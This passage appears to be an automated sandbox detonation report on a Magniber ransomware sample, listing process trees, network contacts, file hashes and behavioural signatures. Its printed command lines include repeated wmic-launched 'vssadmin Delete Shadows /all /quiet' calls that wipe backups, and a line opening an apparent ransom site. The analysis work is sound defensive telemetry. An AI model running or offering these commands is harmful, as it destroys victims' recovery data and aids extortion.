PID 1124 wrote to memory of 1628 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1124 wrote to memory of 1628 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1124 wrote to memory of 1628 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\wbem\wmic.exe
PID 1124 wrote to memory of 1056 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 1056 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe
PID 1124 wrote to memory of 1056 N/A C:\Windows\system32\taskhost.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb^&2^&32792626^&83^&373^&12"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://34c06a48a400dc40fcuahnpdvb.iecard.top/uahnpdvb&2&32792626&83&373&12

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:380 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 34c06a48a400dc40fcuahnpdvb.iecard.top udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2000-0-0x0000000001E40000-0x00000000024BC000-memory.dmp

memory/2000-11-0x0000000002580000-0x0000000002581000-memory.dmp

memory/1124-12-0x0000000001F10000-0x0000000001F15000-memory.dmp

memory/2000-10-0x00000000024C0000-0x00000000024C1000-memory.dmp

memory/2000-9-0x0000000001DA0000-0x0000000001DA1000-memory.dmp

memory/2000-8-0x0000000001D90000-0x0000000001D91000-memory.dmp

memory/2000-7-0x0000000001D50000-0x0000000001D51000-memory.dmp

memory/2000-6-0x0000000001D40000-0x0000000001D41000-memory.dmp

memory/2000-5-0x0000000001D30000-0x0000000001D31000-memory.dmp

memory/2000-4-0x0000000001D20000-0x0000000001D21000-memory.dmp

memory/2000-3-0x0000000001D10000-0x0000000001D11000-memory.dmp

memory/2000-2-0x0000000001D00000-0x0000000001D01000-memory.dmp

memory/2000-1-0x00000000002A0000-0x00000000002A1000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 2ceb8fb4b9fb237c73bc7459c7b4b88a
SHA1 2eb158ec1f1c2f28184da351db601f41fdac614b
SHA256 d0d6b9254b77b996f1ac0f32562b34609dce39936d2b6d3905d839526894de9a
SHA512 4f5a0641b20a9f8949e06fea648c2765ae66dcd46c0c6757b2a9f2041166aab4b976f36121842f94e095ad211866001c4508e6e9de8196de4ec40a020713e709

memory/2368-297-0x0000000002190000-0x0000000002290000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab62B.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar6EC.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9d99bb962f25b844c217e873216cd705
SHA1 1f33f0ca49ce85abb07f3422b61babb384320260
SHA256 f08da872174cc1c008f0154be3dfebd24c7c93f073f20e01b4d2a3dede4ffa56
SHA512 d9b69014cab9e36be5f566af6b431bd94c1d845ce87438bab3c959cde5d7e131cf0f3a70d2d7f091712f5317cc52a12b966473ec6c69000c8e2c0e9ff47aa083

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a10de4b5cb9522de47513a3867608701
SHA1 3f819c6305a2e34e6d2bc25514e538d0d30f1aa7
SHA256 0e505d1019add5e8671fef4f2865a497fc3e51680d957a659b56ec1c3810f340
SHA512 bd048d723174aec984824c65364ae5d3904d2244462d9d1e39c2f2e92ca2c8851d9194be7cf533654ba09d21ccbb78c6f4f9f323d4955faeb68a6488cb4b627c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 645c415e5d624ef9f4fcfff17a0c721f
SHA1 1b3a8f2a2336314bd45de2232e531d73084cf7c4
SHA256 f95ca1ea7a94cb5651da49aa6d079cb15356f284d36cb74d912f54cb9e8597b1
SHA512 42751369ca7ffdf8626a5cca10b238bc6e957c009ca7eda4650fb815086d0cb40cff678c854127a02596db5387927ce64625f4bb68397fa222fa52c4cd90183d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cd7fbe831d38f9e278d029d722dc8c93
SHA1 69355a0e101a1d5073ac2c7e664df339d2d4091e
SHA256 e09370cef2a7d3389b2376cfa68d9bf6b3289904c378afd69cd0dbe08bad8c3d
SHA512 07754eda6dd48d3d8c051f3b635c77055d1628dffaa8075149e38028bb23fa040b9568364f0b6c2e338edd9d1ac36a35de30d28080e2d3cd71557e8842ac99a7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 57e0cd32b99640e45b285218329c6546
SHA1 ba60f2a559acbe95568550baf7e095e88b6d4467
SHA256 1b2810bd143e452e02fa3ce77468de61bb4f06865d360f3cb60a127d92560dfa
SHA512 d6afef7313fdf2c11d5026e18544a4278ec5a27177db2149d35cb8cdfb6b9ed33d46fbd3d2febc959ead44f8337e79a543536ee0b92e89d0b8760a3f89dbf38e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ac88dfa920b262b1b192a8f6971e17c3
SHA1 79aa53d5209ef48afd4e587d268a87dd61135e33
SHA256 d6a67d18d68088d9868c10b0b4dc8a31c519192d73e5f219b569c29fadf48de0
SHA512 6926df7fb5af13b26cb8d7be32fb08fee59a903fc5e370d08c115ce233bb9d2601d8c200db205060e369979acff58047d344562a739f8e3feea55a49daa36c51

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6d20ad33581c751e8c52ed4ed9b2932c
SHA1 a1ee0f6cef21ab9856470be3e567403e37de6d50
SHA256 963491eea5af56ca53e8766d614116772da5594a681942da3e8b6c700ae27938
SHA512 faaa04e94705a388ba3d0edbdce024d8a59ea62897e0cbae48282a0585c94985963a10efbf6eae4caac59444971914c49bffff07b73bd6a89f311844713df066

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8759a516cddcf4c9384afed7be1eb7df
SHA1 61aa4f62bd7d543fa8fb63fc22cf94462ff85624
SHA256 910a85e8b6858e515db39de0744a79282649cc69c6f94c36f2ac50aedc54197d
SHA512 78470f9e2a711cc4a2648e2c136ee66bd77e477705e3b556513fd7c5b0d56d8a994f703ac5555e7973973bfe99035e5a657e0ef71235befe2a127026527b36c6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 817ae38ae8ab7aa55a7181d822228a8f
SHA1 81dcd28761bb787d910e970e7ae2f95708fa0f3a
SHA256 1d49eb7bd1a6213c1b63a42560ee95933ade34fb8f078787c18cafbae0299379
SHA512 0077286a4632464c494948dad0b32d5d37288dadc30d72b2e4208a5e6f816e4a005a6836ea40ce3d9e852d7b21ccc4a6926d7202d0d716a0ba6683e4eac9bb27

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7f32bc4b8994c3a276ef6ccf3c22a6e1
SHA1 9233d3521edaac27193aeb642c1c5bed0046d66a
SHA256 dec96a0895991a55996c2bb6fd6c4407d0a00d39aaad5eb8c8c07d981d4fdc41
SHA512 df1f3151efdb03cd73f09f96a4b5f31ea1b03681e2c73f15714628b7d9814e5de86c4f988a265b8a357a52aeb5df3c4919fcad9aecfcf3e8d492f627365518cd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9592dd6a6c6c71bc9883c5361b26c49a
SHA1 85be3df241785dc1d07805f669ac02e43d32709a
SHA256 8d33d20863f7f482a33bdbb1799fc3fd632ede08b6e74107bdd1b0f855b131c2
SHA512 ca4a900610c71db295e3a9a0e67d706838d18c9835cc90cd8da6fa01370d7c98a7997e4c59cb9705c150c04fa550bc81f59ee8c032af72c18cb383511edeb729

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 22b4123c06f6797f3c42ce0693299f29
SHA1 436627c9ab5fe743fcf4b774855380df2320e106
SHA256 4e71e3386a9de2a074821389bd9dfeaa338355dfabdb146c1e90502970f3bf70
SHA512 752716aba6c11dacea399130f26bc5e2d0bd934eaab95a8d7007676f010f46ebfa1e4342505a221809caa2cc02ccda8d350a3eca9ec505c9da5f1d731403aa9b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b295d0a4302158a2ef9bad9157bd724f
SHA1 780adedf0c37a71e1c6c6d3c4ba0626932eaf8ea
SHA256 f1f6cd8a6687fa90b5505f22f29d3d98e6ff1bc6ecf5a8464d44e826d21f33cd
SHA512 52ac127f034d05dee8a550e4feed672ca96fb2b293c306474bf3f9984c87d28c94ec6c8d13614c750dc8f14cfba746d18f55287fccb324a0bbb52ec9632dac87

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c4554eff85495e20e7b2394252794d5a
SHA1 9d5979a329439b1b78a18671122efb1979bb80da
SHA256 e6f65e15a86f3197326f30632fa938127f0457d7175f6b2a5b3c8418faecade6
SHA512 19d05f5588204aca65e77e2abe15837161289229497324e4e846d8efe29f3478ec7e3fabc9a9fab339d14e14d1a8936577aa2aa7edf2a279ae890505dc4e17c7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6aa33a5999a7084fc8f5e5f81ee74e48
SHA1 d6d467e2f7f08b9b7cc17c399333e6865d2779f5
SHA256 8886c58a0f00ff3cae79a6b7903b4f0672fdbd360a1d83f6fb7e69bb9694c0c4
SHA512 8bdcfa6db33d3a727a7d7297c8cd4a66817dba628bcf7dacbe7bde388e3d9b67a6b7080cb241c021cf26ad52bd8fbe80c8321c1152b38fe94f003c7a134d1441

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 681e87f0e7c918fb2624d74d1a6b3842
SHA1 3849a18bfd2e40318a159e8daef971314e43507d
SHA256 0f0b8fd0dff7244068ff87b95495ae5d7eefeacc263f169e138069c49c73f34c
SHA512 a1aa96705e4fd4710c4eaa570e565116073f99605a8d14bc4756ebaa60c17d9ae1c0b61a8d873c46327947169a295bf0fd2d915ae0e7568043f34078b2d9d62f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e074a24030c7574fdfafc4a5ba2cbb12
SHA1 d3a9ce95959686747ce62ada173fb4185657611e
SHA256 36d4840b94b079dbf1c70adda9843f01d799c620824b35aa03a392808a60108d
SHA512 8c262ee32cfef5dfaaea64e8bd9bec5ab0b362df2f52272ead2c754778bf24c04ec783fd9b5a83c0ed86d83972e6e73bd04f1559926e1c13a35e6a49a0db4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e34e21a02bd8b04dcbc0124894c6382f
SHA1 f63257d1b6a2e0cf4f47045c1df426089c096cf2
SHA256 84ad02ba3ea9cf407284611a6228d3cc3383fa54e4436ec6d87f1517e4dfec81
SHA512 07e58e1e72cda8663a2a77e01dd8a59c2596e8a3ee86236cfcdf8bcd4b4929edf6fb662420008786c89f29b7fd1aef9bb72c7d488b25b18633370a21b945714a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0e4c872d1ea0ab17f82147dc44544708
SHA1 5f89b53258885bba1ca85283df0c6818da297782
SHA256 d25943b84567b92b9cec8ca7da0834365b4f0b959fd7bfa1820fa7242220a9f8
SHA512 713addb7f9ffc68bbba7f02060a4a6b2e446dec04d0536e091b99f79b591ff427b119a2a8e004b2df63c211f70bee6cd6df13010479b2b5874b25eae5c78588d

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 04:21

Reported

2024-12-06 04:24

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

sihost.exe

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (62) files with added filename extension

ransomware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4028 set thread context of 2648 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\sihost.exe
PID 4028 set thread context of 2676 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 4028 set thread context of 2808 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhostw.exe
PID 4028 set thread context of 3472 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 4028 set thread context of 3640 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 4028 set thread context of 3844 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe
PID 4028 set thread context of 3940 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
PID 4028 set thread context of 4008 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 1040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
PID 4028 set thread context of 3512 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 0 N/A C:\Windows\system32\rundll32.exe N/A
PID 4028 set thread context of 2292 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 4764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
PID 4028 set thread context of 1220 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 2496 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 4028 set thread context of 2592 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\backgroundTaskHost.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
